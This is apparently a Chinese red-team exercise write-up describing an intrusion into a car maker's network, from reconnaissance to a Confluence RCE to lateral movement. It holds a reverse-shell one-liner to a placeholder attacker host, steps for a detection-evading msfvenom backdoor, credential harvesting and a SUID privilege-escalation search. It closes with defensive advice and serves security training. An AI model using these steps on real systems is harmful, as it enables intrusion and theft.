攻防演练 | 记一次打穿某车企全过程
字数 1601 2025-08-10 16:34:22

车企网络攻防演练实战教学文档

0x00 前言

本教学文档基于一次真实的汽车企业网络攻防演练案例,详细记录了从外网渗透到内网的全过程。文档将按照攻击流程分步骤讲解,包含信息收集、漏洞利用、权限提升、横向移动等关键环节。

0x01 信息收集阶段

1.1 企业资产梳理

关键工具:自研信息收集脚本

步骤

  1. 使用子公司收集脚本进行企业架构梳理

    • 从一级公司开始搜索
    • 查找控股50%以上的子公司
    • 递归搜索至四级子公司
    • 输出完整的公司控股关系树
  2. 资产收集流程

    • 基于ICP备案信息
    • 子域名枚举(使用工具如subfinder、amass等)
    • 端口扫描(masscan/nmap)
    • Web路径探测(dirsearch/gobuster)
    • 服务指纹识别(nmap/banner识别)
  3. 输出三类文件:

    • IP列表:用于后续的资产扫描
    • URL列表:用于Web漏洞扫描
    • 详情文件:记录服务详情供人工审计

1.2 自动化扫描

推荐工具组合

  • 资产扫描:灯塔(ARL)、FOFA、ZoomEye
  • 漏洞扫描:xray、poc-bomber、Nuclei
  • 子域名:OneForAll、Subfinder
  • 端口服务:masscan+nmap组合

0x02 Web打点阶段

2.1 自动化扫描

执行流程

  1. 使用xray等工具对收集的URL进行批量扫描
  2. 使用poc-bomber等开源POC框架测试已知漏洞
  3. 分析扫描结果,筛选有效漏洞

注意事项

  • 自动化扫描可能遗漏一些需要交互的漏洞
  • 部分WAF可能拦截扫描行为
  • 扫描结果需要人工验证

2.2 人工审计

审计重点

  1. 识别特殊系统:

    • 办公系统(OA、邮件)
    • 开发协作系统(Confluence、Jira)
    • 运维系统(Jenkins、GitLab)
    • 物联网管理系统
  2. 本例中发现的关键系统:

    • Confluence系统(标题为XXConfluence)
    • 确认版本存在已知RCE漏洞
    • 操作系统识别为Linux

2.3 漏洞利用

Confluence RCE利用步骤

  1. 确认漏洞存在性(CVE-2022-26134等)
  2. 构造恶意请求执行命令
  3. 验证命令执行结果
  4. 建立反弹shell:
    bash -i >& /dev/tcp/攻击IP/端口 0>&1
    
  5. 获取交互式shell

2.4 后渗透准备

  1. 上传持久化后门:

    • 使用msfvenom生成Linux payload
    • 上传并设置执行权限
    • 确保后门能绕过常见检测
  2. 网络环境探测:

    ifconfig 或 ip a
    
    • 发现内网IP:172.32.0.30
    • 确认网络架构
  3. 代理工具部署:

    • 上传frp/ngrok/reGeorg等工具
    • 建立隧道连接内网

0x03 内网横向移动

3.1 内网信息收集

  1. 网络拓扑探测:

    • 路由信息:route -n
    • ARP缓存:arp -a
    • 活跃主机扫描:fping或内网版nmap
  2. 凭证收集:

    • 查找配置文件
    • 检索历史命令中的密码
    • 检查常见凭证存储位置

3.2 权限提升

Linux提权方法

  1. 内核漏洞利用:

    • 使用uname -a查看内核版本
    • 搜索对应exploit
  2. SUID/GUID滥用:

    find / -perm -4000 -type f 2>/dev/null
    
  3. 定时任务检查

  4. 环境变量劫持

3.3 横向移动技术

  1. 密码喷洒攻击
  2. Pass-the-Hash攻击
  3. 利用内网服务漏洞
  4. 中间人攻击(如LLMNR/NBT-NS欺骗)

0x04 防御建议

4.1 针对Confluence防护

  1. 及时更新补丁
  2. 限制访问IP
  3. 启用双因素认证
  4. 配置Web应用防火墙规则

4.2 内网防护措施

  1. 网络分段隔离
  2. 部署终端检测与响应(EDR)
  3. 实施最小权限原则
  4. 监控异常网络连接

4.3 安全运维建议

  1. 定期红蓝对抗演练
  2. 建立威胁情报机制
  3. 完善日志收集与分析
  4. 制定应急响应预案

0x05 总结

本案例展示了从外网到内网的完整渗透流程,重点包括:

  1. 全面的信息收集是成功的基础
  2. 自动化与人工审计相结合
  3. 对常见企业系统的漏洞利用
  4. 内网环境的快速适应与横向移动

通过此类演练,企业可以更好地了解自身安全弱点,针对性加强防御措施。

车企网络攻防演练实战教学文档 0x00 前言 本教学文档基于一次真实的汽车企业网络攻防演练案例,详细记录了从外网渗透到内网的全过程。文档将按照攻击流程分步骤讲解,包含信息收集、漏洞利用、权限提升、横向移动等关键环节。 0x01 信息收集阶段 1.1 企业资产梳理 关键工具 :自研信息收集脚本 步骤 : 使用子公司收集脚本进行企业架构梳理 从一级公司开始搜索 查找控股50%以上的子公司 递归搜索至四级子公司 输出完整的公司控股关系树 资产收集流程 基于ICP备案信息 子域名枚举(使用工具如subfinder、amass等) 端口扫描(masscan/nmap) Web路径探测(dirsearch/gobuster) 服务指纹识别(nmap/banner识别) 输出三类文件: IP列表:用于后续的资产扫描 URL列表:用于Web漏洞扫描 详情文件:记录服务详情供人工审计 1.2 自动化扫描 推荐工具组合 : 资产扫描:灯塔(ARL)、FOFA、ZoomEye 漏洞扫描:xray、poc-bomber、Nuclei 子域名:OneForAll、Subfinder 端口服务:masscan+nmap组合 0x02 Web打点阶段 2.1 自动化扫描 执行流程 : 使用xray等工具对收集的URL进行批量扫描 使用poc-bomber等开源POC框架测试已知漏洞 分析扫描结果,筛选有效漏洞 注意事项 : 自动化扫描可能遗漏一些需要交互的漏洞 部分WAF可能拦截扫描行为 扫描结果需要人工验证 2.2 人工审计 审计重点 : 识别特殊系统: 办公系统(OA、邮件) 开发协作系统(Confluence、Jira) 运维系统(Jenkins、GitLab) 物联网管理系统 本例中发现的关键系统: Confluence系统(标题为XXConfluence) 确认版本存在已知RCE漏洞 操作系统识别为Linux 2.3 漏洞利用 Confluence RCE利用步骤 : 确认漏洞存在性(CVE-2022-26134等) 构造恶意请求执行命令 验证命令执行结果 建立反弹shell: 获取交互式shell 2.4 后渗透准备 上传持久化后门: 使用msfvenom生成Linux payload 上传并设置执行权限 确保后门能绕过常见检测 网络环境探测: 发现内网IP:172.32.0.30 确认网络架构 代理工具部署: 上传frp/ngrok/reGeorg等工具 建立隧道连接内网 0x03 内网横向移动 3.1 内网信息收集 网络拓扑探测: 路由信息: route -n ARP缓存: arp -a 活跃主机扫描: fping 或内网版nmap 凭证收集: 查找配置文件 检索历史命令中的密码 检查常见凭证存储位置 3.2 权限提升 Linux提权方法 : 内核漏洞利用: 使用uname -a查看内核版本 搜索对应exploit SUID/GUID滥用: 定时任务检查 环境变量劫持 3.3 横向移动技术 密码喷洒攻击 Pass-the-Hash攻击 利用内网服务漏洞 中间人攻击(如LLMNR/NBT-NS欺骗) 0x04 防御建议 4.1 针对Confluence防护 及时更新补丁 限制访问IP 启用双因素认证 配置Web应用防火墙规则 4.2 内网防护措施 网络分段隔离 部署终端检测与响应(EDR) 实施最小权限原则 监控异常网络连接 4.3 安全运维建议 定期红蓝对抗演练 建立威胁情报机制 完善日志收集与分析 制定应急响应预案 0x05 总结 本案例展示了从外网到内网的完整渗透流程,重点包括: 全面的信息收集是成功的基础 自动化与人工审计相结合 对常见企业系统的漏洞利用 内网环境的快速适应与横向移动 通过此类演练,企业可以更好地了解自身安全弱点,针对性加强防御措施。